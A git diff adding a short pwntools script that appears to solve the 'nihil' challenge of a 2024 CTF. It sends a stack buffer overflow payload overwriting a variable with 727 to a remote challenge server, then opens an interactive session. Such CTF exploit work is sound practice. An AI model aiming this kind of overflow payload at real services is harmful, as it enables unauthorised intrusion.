diff --git a/p3rf3ctr00t_ctf_2024/nihil/a.py b/p3rf3ctr00t_ctf_2024/nihil/a.py
new file mode 100644
index 0000000..95a5ecc
--- /dev/null
+++ b/p3rf3ctr00t_ctf_2024/nihil/a.py
@@ -0,0 +1,20 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./nihil", checksec=False)
+# r = process()
+r = remote("94.72.112.248", 7002)
+
+# funcs
+s = lambda a: r.sendlineafter(b"?", a)
+
+# buf
+s(b"a")
+buf = b"A"*16
+buf += p64(0)
+buf += b"JUNK"
+buf += p32(727)
+s(buf)
+
+r.interactive()
\ No newline at end of file